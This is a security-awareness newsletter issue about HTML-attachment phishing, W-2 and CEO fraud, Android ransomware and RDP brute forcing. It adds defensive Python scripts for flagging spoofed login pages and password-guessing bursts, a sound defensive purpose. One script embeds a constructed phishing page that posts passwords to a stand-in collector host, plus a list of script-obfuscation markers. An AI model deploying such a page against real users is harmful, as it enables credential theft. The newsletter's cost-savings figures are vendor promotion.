CyberheistNews Vol 6 #19 Scam Of The Week: Hidden Dangers Of HTML Attachments



Stu Sjouwerman

Over the last six to nine months we have seen a lot of malicious .DOC and .JS attachments, used mainly for ransomware attacks.

However, our researchers have spotted an up-and-coming trend: malicious HTML "attackments" used for credentials phishing. There are a few reasons why the bad guys have taken a liking to HTML:

  1. Reduced chance of antivirus detection: the page is plain text with no executable payload for a scanner to catch
  2. Users are familiar with HTML attachments and do not see any harm in opening them

Bad guys are using .HTML attachments to spoof bank login pages, popular online services, and secure messages from financial institutions.
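For the technical readers, here is an added example of the kind of check a mail gateway or triage script can run on an inbound message. It is written for this issue as an illustration and is not KnowBe4 code: it pulls every HTML attachment out of a raw message and reports the signs of a spoofed login page. The message, sender, hostnames, form action, trusted-host list and obfuscation markers in it are all constructed or assumed for the example.

```python
"""Flag HTML e-mail attachments that look like spoofed login pages.

Added example, not KnowBe4 code. It parses a raw message with the standard
library, pulls out every part that is an HTML attachment and reports the signs
of a credential-phishing page: a password form that posts to a host you do not
trust, a password form with no real action (the page's script does the
posting), or script that unpacks obfuscated content at load time.
The message, hostnames and form action below are constructed for the example;
TRUSTED_HOSTS and OBFUSCATION_MARKERS are assumptions to tune per organisation.
"""
import base64
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts that legitimately receive a password from an HTML attachment, e.g. your own
# portal or the secure-message provider your bank actually uses (assumed values).
TRUSTED_HOSTS = {"www.example-bank.com", "securemail.example-bank.com"}
# Script calls commonly used to unpack an obfuscated phishing page at load time.
OBFUSCATION_MARKERS = ("unescape(", "atob(", "document.write(", "fromCharCode(")


class FormScanner(HTMLParser):
    """Collect forms, the password fields inside them and inline script text."""

    def __init__(self):
        super().__init__()
        self.forms = []            # one dict per <form>: action, and whether it holds a password field
        self.orphan_password = False
        self.script_text = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.forms.append({"action": attrs.get("action") or "", "password": False})
        elif tag == "input" and (attrs.get("type") or "").lower() == "password":
            if self.forms:
                self.forms[-1]["password"] = True
            else:
                self.orphan_password = True
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script_text.append(data)


def scan_html(html):
    """Return the reasons this HTML looks like a credential-phishing page ([] if clean)."""
    scanner = FormScanner()
    scanner.feed(html)
    reasons = []
    for form in scanner.forms:
        if not form["password"]:
            continue
        host = urlparse(form["action"]).hostname
        if host is None:
            reasons.append("password form with no absolute action (script submits it)")
        elif host.lower() not in TRUSTED_HOSTS:
            reasons.append(f"password form posts to external host {host}")
    if scanner.orphan_password:
        reasons.append("password field outside any form")
    script = "".join(scanner.script_text)
    reasons.extend(f"obfuscation marker {m}" for m in OBFUSCATION_MARKERS if m in script)
    return reasons


def scan_message(raw):
    """Scan every HTML attachment of a raw RFC 5322 message; return [(filename, reasons)]."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    hits = []
    for part in msg.walk():
        filename = part.get_filename() or ""
        # Phishers send the page as text/html or as application/octet-stream named *.html.
        html_by_name = filename.lower().endswith((".htm", ".html"))
        html_by_type = part.get_content_type() == "text/html" and part.is_attachment()
        if not (html_by_name or html_by_type):
            continue
        content = part.get_content()
        html = content.decode("utf-8", "replace") if isinstance(content, bytes) else content
        reasons = scan_html(html)
        if reasons:
            hits.append((filename, reasons))
    return hits


# Constructed phishing page: a "secure message" form that posts the password elsewhere.
PHISH_PAGE = """<html><head><title>Secure Message</title></head><body>
<form method="post" action="https://secure-mail-login.example.net/collect.php">
  Email: <input name="user" type="text">
  Password: <input name="pass" type="password">
  <input type="submit" value="View Secure Message">
</form>
<script>document.write(unescape('%3Cp%3EYou have 1 new secure message%3C%2Fp%3E'));</script>
</body></html>
"""


def build_sample_message():
    """Construct the e-mail that carries PHISH_PAGE as SecureMessage.html (sample data)."""
    boundary = "==cyberheist-example=="
    attachment = base64.b64encode(PHISH_PAGE.encode()).decode()
    return (
        "From: Secure Messaging <notice@example-bank.com>\r\n"
        "To: user@example.com\r\n"
        "Subject: You have a new secure message\r\n"
        "MIME-Version: 1.0\r\n"
        f'Content-Type: multipart/mixed; boundary="{boundary}"\r\n\r\n'
        f"--{boundary}\r\n"
        "Content-Type: text/plain; charset=utf-8\r\n\r\n"
        "Please open the attached secure message.\r\n"
        f"--{boundary}\r\n"
        'Content-Type: text/html; name="SecureMessage.html"\r\n'
        "Content-Transfer-Encoding: base64\r\n"
        'Content-Disposition: attachment; filename="SecureMessage.html"\r\n\r\n'
        f"{attachment}\r\n"
        f"--{boundary}--\r\n"
    ).encode()


if __name__ == "__main__":
    for name, why in scan_message(build_sample_message()):
        print(name, "->", "; ".join(why))
```

A real secure-message envelope from a bank also contains a password form, but it posts to the provider's own host, which is why the check allowlists hosts instead of flagging every password field; keep that list to the providers you actually use. The obfuscation markers are the weaker signal, since legitimate pages call atob() too, so treat a hit as a reason to quarantine for review rather than to block outright.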

Inevitably, your filters are going to miss some of these, and I suggest you send the following to your employees as part of your ongoing awareness campaign:

Internet criminals never stop trying to get past our spam filters and trick you into clicking on phishing links or opening malicious email attachments.

This is a warning against a new type of attack that uses an HTML attachment which tries to scam you into entering your user name and password.

HTML attachments are often used by banks for secure messages, so you might think that these are always safe. They are NOT. If you get an email with an HTML attachment, be just as careful as always and do not open it unless you have asked for it, or have verified with the sender that the attachment is legit.

Remember: Always Think Before You Click!


We have a new blog post with lots more detail, background, examples and screenshots here:
https://blog.knowbe4.com/the-hidden-dangers-of-.html-attachments

InfoSec Analyst: "We Make People Suck At IT Security"

Ex-Gartner IT security analyst Ben Tomhave calls himself an infosec obsessive, and I admire his insightful analyses whenever they appear. This time he commented on the wave of criticism that followed the release of the Verizon Data Breach Investigations Report (DBIR).

His blog post is an excellent perspective on the current state of security, and he breaks it into three sections. The first is about the woes of patching, and he nails it. The second is about people, and I'll quote him here:

"The second major theme from DBIR and myriad other reports is that people continue to be the weakest link in security models. Now, this is for a number of reasons, most of which revolve around the fact that we give them easily exploited systems and then somehow expect them to magically protect these vulnerable boxs without any tools for self-defense.

"So, ultimately, as infosec and IT professionals, it's our fault that people suck, because we're making them suck. Think about that the next time you want to mutter "stupid users" over the latest compromise.

"Beyond the fundamental failures of expecting people to not get pwnd in a vulnerable environment, there are other things that can and should be done. Doing security awareness in the traditional, stupid, CBT-driven way is not it. Instead, we need to do a far better job engaging our target audience and embed practices and awareness into their DNA.

"You cannot do this in one standard cookie cutter manner, but instead must invest in more progressive methods."

I could not agree more. I have worked very hard these last five years to provide you with a platform that you can use to better manage the problem of social engineering, and that is also easy, affordable and fun to use. Check all the features here:
https://www.knowbe4.com/security-awareness-training-2016-features/

The third part of Tomhave's analysis relates to the controversy about the source data used for the Verizon report, and is very entertaining just by itself. Warmly Recommended!
http://www.secureconsulting.net/2016/05/dbir-2016-lots-of-noise-and-dr.html

Brunswick Corp.'s 13,000 Workers' W-2 Data Compromised

Brunswick Corp. reported on May 3 that it was victimized by a spear phishing scam that netted the W-2 information for possibly all 13,000 current and former company employees.

On April 29, 2016 a Brunswick employee responded to what was thought to be a legitimate email from management requesting the W-2 information. In fact, the data was sent to an unknown and unauthorized individual.

Brunswick noted "that this was not a technical intrusion of its information systems, but rather a criminal scam that plays on human nature."

I just learned that this type of data loss costs about $300 per employee in combined legal fees and identity theft protection. Do the math: for 13,000 employees that is $3,900,000 in damage. Compare that to just $7.50 per employee per year for Platinum Level security awareness training at that volume discount level. You just saved a whopping $3,802,500 in budget dollars, and you're the IT superhero.

Should Someone Who Falls For A W-2 Phishing Attack Be Fired?

Alpha Payroll fired an employee who fell for a W-2 phishing scam. This CEO Fraud attack compromised all of the 2015 W-2 records the firm had produced for its clients. Steve Ragan has the story at CSO; it is an interesting read, and the discussion it started is even more interesting. Here is the link to the story:
http://www.csoonline.com/article/3064675/security/alpha-payroll-fires-employee-victimized-by-w-2-phishing-scam.html

I'd like your opinion on this and I created a super simple 2-question survey that you can use to give me your feedback. Should someone who falls for a W-2 phishing attack be fired? In the next issue I will report back what you told me!
https://www.surveymonkey.com/r/W-2fired

Don't Miss The May Live Demo: New-School Security Awareness Training

Today, your employees are frequently exposed to sophisticated phishing and ransomware attacks. Old-school security awareness training doesn’t hack it anymore. More than ever, your users are the weak link in your network security.

Join us tomorrow Wednesday, May 11 at 2:00 p.m. (EDT) for a 30-minute live product demonstration of the innovative Kevin Mitnick Security Awareness Training Platform to see the latest features and how easy it is to train and phish your users:

  • Send Phishing Security Tests to your users and get your Phish-prone percentage.
  • Roll out Training Campaigns for all users (or groups) with follow-up emails to “nudge” incomplete users, as well as point-of-failure training auto-enrollment.
  • NEW EZXploit™ patent-pending functionality that allows an internal, fully automated "human pentest”.
  • NEW USB Drive Test™ allows you to test your users' reactions to unknown USB drives they find.
  • Advanced Reporting to watch your Phish-prone percentage drop, with great ROI.

PS: If we have time we'll show you the new Browser Plugin Vulnerability Detection we just added last week!

Find out how thousands of organizations have mobilized their end-users as their first line of defense: Register Now:
https://attendee.gotowebinar.com/register/6490307561967355137

Warm Regards,
Stu Sjouwerman

Quotes Of The Week

"The truth is like a lion. You don't have to defend it. Let it loose. It will defend itself."
- St. Augustine

"The future belongs to those who believe in the beauty of their dreams."
- Eleanor Roosevelt


Thanks for reading CyberheistNews


Security News
Troy, Mich. Investment Firm Loses 495,000 Dollars In CEO Fraud

An employee at a Troy, Mich., investment firm fell for a CEO Fraud attack and was socially engineered into wiring 495K to a bank in Hong Kong. The error was noticed eight days after the transfer, so the money is long gone.

They have reported it to their insurer, but very often this type of CEO Fraud is not covered, even when you have a specific cyber insurance policy, because no hardware or software was hacked. It was the human that was hacked instead.

The Troy police department said that Pomeroy Investment Corp. filed a report on April 18 stating a staffer had sent 495,000 dollars overseas to China after receiving an email request purportedly from a company executive, according to The Detroit News.

A story in SCMagazine quoted the Troy Police Sgt. Meghan Lehman who said: “Previously, it was typical for company employees to communicate by email and to make transfers of funds — even overseas, but in this case, someone hacked the account of the sender requesting the funds. And then it was days later before anyone questioned the transaction and learned they had been hacked.”

In a case of closing the barn door after the horse has bolted, Pomeroy Investment Corp. has now changed its security policy so that a wire transfer is no longer made on the strength of an email request alone.

If they had only deployed the first layer of defense-in-depth, meaning a security policy in place, a security procedure that is actually followed, and employees stepped through effective security awareness training, this 500K loss could have been prevented. More about defense-in-depth:
https://blog.knowbe4.com/defense-in-depth-your-answer-to-social-engineering

Dogspectus: New, Stealthier Android Ransomware

Samsung Business Insights has a good post about ransomware that locks the whole device and demands Apple iTunes gift cards to unlock the phone:

"Ransomware is a type of malware that aims to deny access to computing devices and the data they contain until some form of a ransom has been paid. While many forms of ransomware encrypt data on devices to prevent access, there are also forms that merely lock devices.

Dogspectus, which was discovered in April 2016 by Blue Coat Labs, is an example of the second type. It infects devices without requiring any form of user interaction, rendering the device inaccessible within 10 seconds by taking advantage of several vulnerabilities in older versions of Android.

The Dogspectus ransomware then displays a demand for the user to pay a ransom in the form of two $100 Apple iTunes gift cards in order for the device to be unlocked."

More details, including how to deal with it, at the Samsung blog:
https://insights.samsung.com/2016/05/04/dogspectus-new-stealthier-ransomware/

Ransomware Deployments After Brute Force RDP Attack

Attackers wielding ransomware are not always using phishing and malvertising that rely on social engineering tricks to get users to open attachments. They are also targeting you through an often-found hole in your corporate network: Internet-facing, poorly secured remote desktop servers.

According to Wouter Jansen, Senior Forensic IT Expert at Fox-IT, the company has lately been called in by a number of firms that have been hit with ransomware, and a subset of those let the attackers and their ransomware in through exactly that channel.

“Entries in the log files show the attackers got access to the servers by brute forcing usernames and passwords on remote desktop servers that are accessible from the internet. Day in, day out, failed login attempts are recorded coming from hundreds of unique IP-addresses trying hundreds of unique usernames,” Jansen noted. More at their blog:
https://blog.fox-it.com/2016/05/02/ransomware-deployments-after-brute-force-rdp-attack/
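The log entries Jansen describes are exactly what a detection rule should key on. Here is an added example, written for this issue and not Fox-IT's tooling, that runs over a constructed export of Windows Security log events: it finds the source IPs with a burst of failed logons (4625) across many user names, and then the event a defender really cares about, a successful logon (4624) from one of those IPs after the guessing started. The sample events, the 10-minute window and the five-failure threshold are all constructed or assumed.

```python
"""Spot password guessing against RDP in Windows logon audit events, and the logon
that succeeds afterwards.

Added example, not Fox-IT tooling. The input is a constructed CSV export of Security
log events: time, event ID (4625 = failed logon, 4624 = successful logon), logon type
(10 = RemoteInteractive, i.e. RDP), target user name, source IP. With Network Level
Authentication enabled the failures show up as logon type 3, so the failure rule keys
on event ID and source IP only. WINDOW and MIN_FAILURES are assumed thresholds.
"""
from collections import defaultdict
from datetime import datetime, timedelta

FAILED_LOGON, SUCCESS_LOGON = "4625", "4624"
RDP_LOGON_TYPE = "10"
WINDOW = timedelta(minutes=10)
MIN_FAILURES = 5

# Constructed sample: one guessing burst from 203.0.113.7 that ends in a successful
# logon as "backup", a user mistyping their own password, and a service account
# failing a few times from an internal host.
SAMPLE_EVENTS = """\
# time,event_id,logon_type,target_user,source_ip
2016-05-02T03:10:01,4625,10,Administrator,203.0.113.7
2016-05-02T03:10:03,4625,10,admin,203.0.113.7
2016-05-02T03:10:04,4625,10,test,203.0.113.7
2016-05-02T03:10:06,4625,10,scan,203.0.113.7
2016-05-02T03:10:09,4625,10,backup,203.0.113.7
2016-05-02T03:10:12,4625,10,Administrator,203.0.113.7
2016-05-02T03:14:30,4624,10,backup,203.0.113.7
2016-05-02T08:30:10,4625,10,jsmith,198.51.100.22
2016-05-02T08:30:25,4625,10,jsmith,198.51.100.22
2016-05-02T08:30:41,4624,10,jsmith,198.51.100.22
2016-05-02T09:00:00,4625,3,svc_sql,192.0.2.50
2016-05-02T09:02:00,4625,3,svc_sql,192.0.2.50
2016-05-02T09:04:00,4625,3,svc_sql,192.0.2.50
2016-05-02T09:06:00,4625,3,svc_sql,192.0.2.50
"""


def parse_events(text):
    """Parse the CSV export into (time, event_id, logon_type, user, ip) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, event_id, logon_type, user, ip = line.split(",")
        events.append((datetime.fromisoformat(ts), event_id, logon_type, user.lower(), ip))
    return events


def find_bruteforce(events):
    """Per source IP, the densest WINDOW of failed logons; flag IPs reaching MIN_FAILURES."""
    failures = defaultdict(list)
    for ts, event_id, _, user, ip in events:
        if event_id == FAILED_LOGON:
            failures[ip].append((ts, user))
    flagged = {}
    for ip, attempts in failures.items():
        attempts.sort()
        start, best, burst_start = 0, 0, None
        for end, (ts, _) in enumerate(attempts):
            while ts - attempts[start][0] > WINDOW:   # slide the window forward
                start += 1
            if end - start + 1 > best:
                best, burst_start = end - start + 1, attempts[start][0]
        if best >= MIN_FAILURES:
            flagged[ip] = {
                "first_failure": burst_start,
                "failures": best,
                "users": len({user for _, user in attempts}),
            }
    return flagged


def find_successful_logons(events, flagged):
    """Successful logons from a flagged IP after its burst began: that account is compromised."""
    hits = []
    for ts, event_id, logon_type, user, ip in events:
        if event_id == SUCCESS_LOGON and ip in flagged and ts >= flagged[ip]["first_failure"]:
            hits.append({"ip": ip, "user": user, "time": ts, "rdp": logon_type == RDP_LOGON_TYPE})
    return hits


if __name__ == "__main__":
    events = parse_events(SAMPLE_EVENTS)
    flagged = find_bruteforce(events)
    for ip, info in flagged.items():
        print(f"{ip}: {info['failures']} failures in {WINDOW}, {info['users']} user names tried")
    for hit in find_successful_logons(events, flagged):
        print(f"COMPROMISE: {hit['user']} logged on from {hit['ip']} at {hit['time']} (RDP={hit['rdp']})")
```

Two caveats when you turn this into a real alert. Password spraying (one guess per account across hundreds of accounts, often from many IPs) keeps the per-IP count low, so also count failures per target user and in total. And the real fix is not the detection: an RDP server should not be reachable from the Internet at all; put it behind a VPN or gateway with MFA, enable NLA and an account lockout policy, so the log fills up with far less of this noise in the first place.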

SANS May Issue Of OUCH!

They said: "We are excited to announce the May issue of OUCH! This month, led by the infamous James Lyne, we focus on the Internet of Things (IoT). Specifically, we discuss what IoT is, how IoT impacts our personal lives, and what we can do to protect IoT devices. As such, we ask that you share OUCH! with your family, friends, and coworkers." English Version (PDF)
https://securingthehuman.sans.org/newsletters/ouch/issues/OUCH-201605_en.pdf


Cyberheist 'FAVE' LINKS:
This Week's Links We Like, Tips, Hints And Fun Stuff


